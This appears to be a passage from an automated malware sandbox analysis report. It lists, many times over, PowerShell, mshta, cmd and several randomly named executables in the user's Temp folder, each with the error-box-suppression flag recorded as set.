                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
